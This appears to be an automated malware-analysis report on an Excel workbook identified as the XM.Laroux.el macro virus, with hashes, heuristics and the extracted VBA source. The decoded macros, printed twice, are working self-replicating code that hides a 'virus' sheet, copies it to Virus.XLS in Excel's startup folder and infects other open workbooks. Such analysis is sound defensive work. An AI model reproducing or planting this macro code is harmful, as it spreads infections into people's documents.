XM.Laroux.el Office (OLE) malware analysis — malicious · 739bb12833da3ee7

MALICIOUS

Office (OLE)

49.5 KB Created: 1998-12-15 20:02:35 Authoring application: Microsoft Excel First seen: 2015-09-16

MD5: 45cc898fc1f2f9b916d7ce89fce1e520 SHA-1: 610fe7b27ab5d1aa608c8c239864c1c0852d90a6 SHA-256: 739bb12833da3ee7b17ca68d80486fb1510eb366cdf90408c8384623130e5d26

88 Risk Score

Malware Insights

XM.Laroux.el · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

The file is an Excel 97 document containing VBA macros, specifically identified as the XM.Laroux.el macro virus. The auto_open macro attempts to replicate the virus by saving a copy as 'Virus.XLS' in the startup path and setting up event handlers to spread further. The presence of the 'laroux' marker and the explicit mention of 'Macro Infected Document' and 'Virus Name: XM.Laroux.el' in the document body confirm its malicious nature.

Heuristics 3

Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS

Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2318 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2318 bytes
SHA-256: `f5f6ea12adece008f312f3575a6111196c96ab5986dc6f613cf9b949a29cbf4a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "virus" Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Application.OnSheetActivate = "Check_virus" Application.OnTime TimeValue("10:00:00"), "MassageVirus" Application.OnTime TimeValue("12:00:00"), "MassageVirus" Application.OnTime TimeValue("15:00:00"), "MassageVirus" Application.OnTime TimeValue("20:00:00"), "MassageVirus" End Sub Sub Check_virus() Attribute Check_virus.VB_ProcData.VB_Invoke_Func = " \n14" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "Virus.XLS") If m$ = "Virus.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name Sheets("virus").Visible = True Sheets("virus").Select Sheets("virus").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.Name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "Virus.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("virus").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "Virus.xls!Check_virus" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name If s$ <> "virus" Then Workbooks("Virus.XLS").Sheets("virus").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("virus").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "Virus.xls!Check_virus" Case Else End Select End Sub

SHA-256: f5f6ea12adece008f312f3575a6111196c96ab5986dc6f613cf9b949a29cbf4a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "virus"


























Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "Check_virus"
    Application.OnTime TimeValue("10:00:00"), "MassageVirus"
    Application.OnTime TimeValue("12:00:00"), "MassageVirus"
    Application.OnTime TimeValue("15:00:00"), "MassageVirus"
    Application.OnTime TimeValue("20:00:00"), "MassageVirus"
End Sub

Sub Check_virus()
Attribute Check_virus.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "Virus.XLS")
    If m$ = "Virus.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        Sheets("virus").Visible = True
        Sheets("virus").Select
        Sheets("virus").Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "Virus.XLS", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir c4$
        Workbooks(n4$).Sheets("virus").Visible = False
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "Virus.xls!Check_virus"
    Case 1
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "virus" Then
            Workbooks("Virus.XLS").Sheets("virus").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks(n4$).Sheets("virus").Visible = False
        Else
        End If
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "Virus.xls!Check_virus"
    Case Else
End Select
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.